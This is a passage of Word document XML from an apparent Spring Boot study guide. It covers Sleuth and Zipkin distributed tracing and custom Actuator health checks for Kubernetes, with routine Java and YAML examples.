        <w:t xml:space="preserve"> Forwards the Trace ID in the request header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62225B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icroservice B:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses the same Trace ID to log events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C13F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Zipkin:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aggregates and displays the trace logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F35B600"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870D6">
          <v:rect id="_x0000_i2779" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9419B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3. Propagation of Trace Information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB0A5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leuth automatically adds the following headers in HTTP calls between microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B7D64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TraceId - Identifies the entire trace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A3A67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SpanId - Identifies the current operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E35690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ParentSpanId - ID of the parent span.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520A6CD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X-B3-Sampled - Indicates whether the trace is sampled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FE11E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Example: Passing Trace Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520296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hen using RestTemplate, tracing headers are automatically propagated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484817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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BBBEC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ServiceAController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D92DA99" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00204453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55D8CE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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796AE08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ivate RestTemplate restTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143473C3" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00204453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B49B5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GetMapping("/call-service-b")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CCF7F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ublic String callServiceB() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735160F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ring response = restTemplate.getForObject("http://localhost:8081/service-b", String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14020AA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Response from Service B: " + response;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6036A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5F1CCFF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6F64601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nfiguration for RestTemplate Bean:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C77F9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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18769B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RestTemplate restTemplate() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19478A8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new RestTemplate();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6899BA2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6C864519"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DDB6DA">
          <v:rect id="_x0000_i2780" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7615CA5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4. Setting Up Zipkin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D013C6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To visualize traces, run Zipkin locally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73774D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ocker run -d -p 9411:9411 openzipkin/zipkin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F474E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cess the Zipkin UI: http://localhost:9411</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3734AD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View traces with their IDs, spans, and latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE4CEEB"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CC5CD">
          <v:rect id="_x0000_i2781" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E30E53"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5. Logs Format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA950D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ith Sleuth, logs include trace information automatically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8FBF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name, traceId, spanId, exportable] Message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA1E36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a, 12345678abcd1234, 5678abcd1234abcd, true] Received request from client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D429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FD2603">
          <v:rect id="_x0000_i2782" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5310EEAD"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6. Log Correlation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA14F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ince trace and span IDs are consistent across services, you can correlate logs easily:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067EFCA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Search by Trace ID in each service log file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AE9D2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Use a central log management system (like ELK) for combined search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D0CEBE"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A80114">
          <v:rect id="_x0000_i2783" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4698317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7. Using WebClient with Sleuth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AF091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f you use WebClient, it also integrates seamlessly with Sleuth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FC5CD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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C81B73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WebClient.Builder webClientBuilder() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375F55A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WebClient.builder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6503B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14C517B" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00204453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27DEB8E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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266801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rivate WebClient.Builder webClientBuilder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0F9E29" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00204453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1533905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String callServiceC() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763546C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webClientBuilder.build()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E90CB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get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B99D3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uri("http://localhost:8082/service-c")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4747213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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED219D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odyToMono(String.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3625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lock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1141A66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1E9AB14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3E3AC1">
          <v:rect id="_x0000_i2784" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9029DE"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8. Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A2F62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Always Forward Trace Headers:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use RestTemplate, WebClient, or Feign for automatic propagation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC9FB1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et Sampling Rate Carefully:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use spring.sleuth.sampler.probability to manage trace volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B2F27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rrelate Using Trace IDs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Always log trace IDs for easier search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0D30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entralize Logs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use tools like ELK (Elasticsearch, Logstash, Kibana) or Grafana for unified monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1BB3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Monitor Performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Track response times and failure rates using Zipkin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B1766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Health Checks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that Sleuth doesn’t log health check pings to reduce noise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1753F6"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0B377">
          <v:rect id="_x0000_i2785" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFCCD5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9. Example Log Correlation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105EA60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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service A</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A14141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a, 12345678abcd1234, 5678abcd1234abcd, true] Calling Service B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F537D0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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service B</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EFC0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ervice-b, 12345678abcd1234, 9101abcd1234abcd, true] Processing request from Service A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C9CA1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0. Benefits of Correlated Tracing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505BE8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End-to-End Visibility:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Understand how requests flow between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F9C70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erformance Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Track latency and bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3956433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Error Isolation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Quickly identify problematic services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5E95B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entralized Analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zipkin UI provides a clear trace of calls across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A342E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By implementing Spring Cloud Sleuth and Zipkin, you ensure consistent and efficient tracing of requests across microservices, greatly simplifying debugging and performance analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D85171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BFCBA">
          <v:rect id="_x0000_i2786" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D44CDC" w14:textId="0DBED247" w:rsidR="00187C12" w:rsidRPr="00CE4B95" w:rsidRDefault="00E34E5E" w:rsidP="00187C12">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="689" w:name="_Toc197867903"/>
      <w:r w:rsidRPr="00E34E5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">How do you setup custom health check in Spring Boot application for deploying application </w:t>
      </w:r>
      <w:r w:rsidR="00204453" w:rsidRPr="00E34E5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>in containerization</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34E5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool like Kubernetes</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="689"/>
    </w:p>
    <w:p w14:paraId="1992E5E4" w14:textId="419BA18C" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00D36D33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Setting up a </w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom health check</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a Spring Boot application is crucial for deploying in containerization tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It helps Kubernetes determine the application’s readiness and liveness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338A1AC5"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844F00">
          <v:rect id="_x0000_i2787" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5431C138"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 Use Spring Boot Actuator for Health Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CE706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tuator provides built-in health checks and the flexibility to add custom ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BA672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Step 1: Add Dependencies (Gradle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1713E6D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pendencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718B64E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actuator'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAABE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plementation 'org.springframework.boot:spring-boot-starter-web'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305ADA3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8714B4A"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AD78FD5">
          <v:rect id="_x0000_i2788" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D62264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2. Expose Health Check Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59636E2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nfigure Actuator endpoints in your application.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56867BE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004C38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dpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0726B33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eb:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B7111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xposure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74167C3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clude: health,info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA89D8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68AF2F0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state:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB551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7EEB31E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state:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE59A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46689DD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dpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C65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5D4EA6E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how-details: always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D65F018"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B5E09A">
          <v:rect id="_x0000_i2789" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB88C14"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3. Implement Custom Health Check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E2C06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reate a custom health indicator by implementing the HealthIndicator interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FCAA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D37239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Indicator;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175C2BB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stereotype.Component;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46070F76" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00204453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E8E9E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5D60FF3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HealthIndicator implements HealthIndicator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2B5D02" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00204453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339BFDE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026766C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ublic Health health() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DF739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logic to check health</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E61DB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boolean isHealthy = checkServiceHealth();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3FA1F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f (isHealthy) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63354C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Custom Health Check", "Service is healthy").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC11D2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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2188462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down().withDetail("Custom Health Check", "Service is down").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F8DA2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7CD4FD2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1200A0DB" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00204453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D27A36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ivate boolean checkServiceHealth() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B3DEC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Perform a health check, e.g., database connectivity, external API check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7376AC5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true;  // Replace with actual logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABE98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6CE6281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549C5A2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766875">
          <v:rect id="_x0000_i2790" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3AC6A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4. Access Health Check Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E401F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Run the Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202CEA0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gradlew bootRun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761BD5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ccess the health endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E70F7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http://localhost:8080/actuator/health</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F482B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ample Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB607F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85BE6F2"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atus": "UP",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B79A7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omponents": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ACDAA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ustomHealthIndicator": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304D57A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tatus": "UP",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2228FF8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details": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DFD80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ustom Health Check": "Service is healthy"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6F534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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB3A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4D5CCA0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7BBE458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4D7D4818"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23BA6">
          <v:rect id="_x0000_i2791" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A439FA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5. Liveness and Readiness Probes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F50A8D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ring Boot Actuator provides built-in support for Kubernetes probes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04699AB8"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Liveness Check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6261464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fines whether the application is running properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D11B6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19153E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5F1BAAE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state:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4378C24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0AC1ED85"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Readiness Check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC1C4F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ndicates whether the application is ready to accept traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AEBD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anagement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB5566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ealth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C0152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state:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7E59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enabled: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2930823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Custom Liveness/Readiness Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45004B1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Health;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374D029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LivenessStateHealthIndicator;</w:t>
      </w:r>
    </w:p>
